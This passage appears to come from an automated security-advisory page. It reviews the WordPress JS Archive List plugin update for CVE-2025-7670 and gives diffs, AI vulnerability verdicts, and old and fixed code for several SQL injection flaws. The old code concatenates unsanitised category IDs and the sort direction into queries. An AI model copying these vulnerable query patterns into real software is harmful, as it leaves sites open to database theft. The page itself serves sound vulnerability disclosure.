BY {$order_field} {$order_direction}";+        $results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));+        return is_array($results) ? $results : null;+    }++    /**+     * Maps the query value to the correct DB field.+     *+     * @param string $query_value+     * @return string+     */+    protected function query_val_to_field_name(string $query_value): string {+        switch ($query_value) {+            case 'title':+                return 'post_title';+            case 'name':+                return 'post_name';+            case 'date':+            default:+                return 'post_date';+        }+    }  	public function year_should_be_expanded( $year, $cur_post_year, $cur_post_month, $expandConfig ): bool { 		$months   = $this->get_months( $year );@@ -160,13 +204,13 @@  	public function get_months( $year ) { 		global $wpdb;+        list($where_clause, $where_args) = $this->build_sql_where(intval($year));+        $sql = "SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (+                SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`, ID+                FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL+            GROUP BY JAL.year, JAL.month ORDER BY JAL.year, JAL.month DESC"; -		return $wpdb->get_results( sprintf(-			'SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (-					SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`,ID FROM %s %s %s)-				JAL GROUP BY JAL.year, JAL.month ORDER BY JAL.year,JAL.month DESC',-			$wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year )-		) );+        return $wpdb->get_results($wpdb->prepare($sql, ...$where_args)); 	}  }

AI Analysis

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php Lines 36-44 (old), Lines 39-47 (new)  
Old Code:  
```php
$sql = sprintf(
    'SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (
            SELECT DISTINCT YEAR(post_date) AS `year`, ID
            FROM  %s %s %s) JAL
        GROUP BY JAL.year ORDER BY JAL.year DESC',
    $wpdb->posts,
    $this->build_sql_join(),
    $this->build_sql_where()
);
return $wpdb->get_results( $sql );
```  
Fixed Code:  
```php
list($where_clause, $where_args) = $this->build_sql_where();
$sql = "SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (
        SELECT DISTINCT YEAR(post_date) AS `year`, ID
        FROM  {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL
    GROUP BY JAL.year ORDER BY JAL.year DESC";
$results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
return is_array($results) ? $results : null;
```  
Explanation:  
The old code directly concatenated user-controlled input (from `$this->build_sql_where()`) into SQL queries without proper parameterization, creating SQL injection vulnerabilities. The fixed code uses `$wpdb->prepare()` with parameterized queries, ensuring proper escaping and neutralization of special elements.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php Lines 94-98 (old), Lines 112-127 (new)  
Old Code:  
```php
if (! empty( $this->config['included'] ) ) {
    $ids   = is_array( $this->config['included'] ) ? implode( ',', $this->config['included'] ) : $this->config['included'];
    $where .= sprintf( 'AND %s.term_id IN (%s)', $wpdb->term_taxonomy, $ids );
} elseif ( ! empty( $this->config['excluded'] ) ) {
    $ids   = is_array( $this->config['excluded'] ) ? implode( ',', $this->config['excluded'] ) : $this->config['excluded'];
    $where .= sprintf( 'AND %s.term_id NOT IN (%s)', $wpdb->term_taxonomy, $ids );
}
```  
Fixed Code:  
```php
$ids_key = !empty($this->config['included']) ? 'included' : (!empty($this->config['excluded']) ? 'excluded' : null);
if ($ids_key) {
    $ids = is_array($this->config[$ids_key]) ? $this->config[$ids_key] : explode(',', $this->config[$ids_key]);
    $ids = array_map('intval', $ids);
    $placeholders = implode(', ', array_fill(0, count($ids), '%d'));
    $operator = $ids_key === 'included' ? 'IN' : 'NOT IN';
    $where_parts[] = sprintf('%s.term_id %s (%s)', $wpdb->term_taxonomy, $operator, $placeholders);
    $prepare_args = array_merge($prepare_args, $ids);
}
```  
Explanation:  
The old code directly embedded user-controlled category IDs into SQL queries without validation or escaping. The fixed code validates and sanitizes IDs using `intval()`, creates proper parameter placeholders, and passes values through `$wpdb->prepare()` for safe query execution.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php Lines 100-107 (old), Lines 128-136 (new)  
Old Code:  
```php
if ( $this->only_show_cur_category() ) {
    $query_cat      = get_query_var( 'cat' );
    $categories_ids = empty( $query_cat ) ? $this->config['onlycategory'] : $query_cat;
    if ( ( $this->legacy && is_category() || ! $this->legacy ) ) {
        $where .= sprintf( 'AND %s.term_id IN (%s) ', $wpdb->term_taxonomy, $categories_ids );
    }
}
```  
Fixed Code:  
```php
if ($this->only_show_cur_category()) {
    $query_cat = get_query_var('cat');
    $categories_ids = empty($query_cat) ? $this->config['onlycategory'] : $query_cat;
    $categories_ids = is_array($categories_ids) ? $categories_ids : explode(',', $categories_ids);
    $categories_ids = array_map('intval', $categories_ids);
    if (($this->legacy && is_category()) || !$this->legacy) {
        $placeholders = implode(', ', array_fill(0, count($categories_ids), '%d'));
        $where_parts[] = sprintf('%s.term_id IN (%s)', $wpdb->term_taxonomy, $placeholders);
        $prepare_args = array_merge($prepare_args, $categories_ids);
    }
}
```  
Explanation:  
The old code directly inserted category IDs from query variables or configuration into SQL queries without sanitization. The fixed code validates and sanitizes IDs using `intval()` and uses parameterized queries to prevent SQL injection attacks.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php Lines 117-125 (old), Lines 159-162 (new)  
Old Code:  
```php
return $wpdb->get_results( sprintf(
    'SELECT DISTINCT ID, post_title, post_name, post_date, "false" as expanded FROM %s %s %s ORDER BY %s %s',
    $wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year, $month ),
    $this->query_val_to_field_name( $order_by[0] ),
    $order_by[1]
) );
```  
Fixed Code:  
```php
list($where_clause, $where_args) = $this->build_sql_where( $year, $month);
$order_field = $this->query_val_to_field_name($order_by[0] ?? 'date');
$sql = "SELECT DISTINCT ID, post_title, post_name, post_date, 'false' as expanded FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause} ORDER BY {$order_field} {$order_direction}";
$results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
return is_array($results) ? $results : null;
```  
Explanation:  
The old code concatenated user-controlled `$order_by[1]` (sort direction) directly into the SQL query without validation, allowing potential SQL injection. The fixed code validates the order direction against a whitelist (`['ASC', 'DESC']`) and uses parameterized queries for the WHERE clause.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - classes/class-jq-archive-list-datasource.php Lines 204-210 (old), Lines 207-213 (new)  
Old Code:  
```php
return $wpdb->get_results( sprintf(
    'SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (
            SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`,ID FROM %s %s %s)
        JAL GROUP BY JAL.year, JAL.month ORDER BY JAL.year,JAL.month DESC',
    $wpdb->posts, $this->build_sql_join(), $this->build_sql_where( $year )
) );
```  
Fixed Code:  
```php
list($where_clause, $where_args) = $this->build_sql_where(intval($year));
$sql = "SELECT JAL.year, JAL.month, COUNT(JAL.ID) as `posts` FROM (
        SELECT DISTINCT YEAR(post_date) AS `year`, MONTH(post_date) AS `month`, ID
        FROM {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL
    GROUP BY JAL.year, JAL.month ORDER BY JAL.year, JAL.month DESC";
return $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
```  
Explanation:  
The old code suffered from the same SQL injection vulnerability in the `get_months()` method by directly concatenating user input. The fixed code uses parameterized queries with `$wpdb->prepare()` to safely handle the WHERE clause parameters.

CVE Analysis Results:

CVE-2025-7670: Yes

View CVE Description

The JS Archive List plugin for WordPress is vulnerable to time-based SQL Injection via the build_sql_where() function in all versions up to, and including, 6.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

[CVE-2025-7670] [JS Archive List: 6.1.5→6.1.6] jquery-archive-list-widget.php AI: Not Sure CVE-2025-7670

--- cache/jquery-archive-list-widget_6.1.5/jquery-archive-list-widget.php	2025-12-04 14:05:27.384736873 +0000+++ cache/jquery-archive-list-widget_6.1.6/jquery-archive-list-widget.php	2025-12-04 14:05:29.716886575 +0000@@ -3,7 +3,7 @@   Plugin Name: JS Archive List   Plugin URI: http://skatox.com/blog/jquery-archive-list-widget/   Description: A widget for displaying an archive list with some effects.-  Version: 6.1.4+  Version: 6.1.6   Author: Miguel Angel Useche Castro   Author URI: https://migueluseche.com/   Text Domain: jalw_i18n@@ -35,7 +35,7 @@ 	define( 'JAL_BASE_URL', plugin_dir_url( __FILE__ ) ); } if ( ! defined( 'JAL_VERSION' ) ) {-	define( 'JAL_VERSION', '6.1.4' );+	define( 'JAL_VERSION', '6.1.6' ); }  require_once( 'admin/class-jaw-walker-category-checklist.php' );

AI Analysis

Vulnerability Existed: not sure  
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor - jquery-archive-list-widget.php [3, 35]  
Old Code:  
```php
  Version: 6.1.4
```
```php
  define( 'JAL_VERSION', '6.1.4' );
```
Fixed Code:  
```php
  Version: 6.1.6
```
```php
  define( 'JAL_VERSION', '6.1.6' );
```
Explanation:  
The diff only shows a version number update from 6.1.4 to 6.1.6. Without additional context from the full code or changelog, it's impossible to determine if this version bump includes security fixes. The version number itself could indicate security patches were applied, but the diff alone doesn't reveal any vulnerability details. Therefore, I'm uncertain whether a vulnerability existed in the previous version.

CVE Analysis Results:

CVE-2025-7670: Yes

View CVE Description

The JS Archive List plugin for WordPress is vulnerable to time-based SQL Injection via the build_sql_where() function in all versions up to, and including, 6.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Showing 21 to 26 of 26 results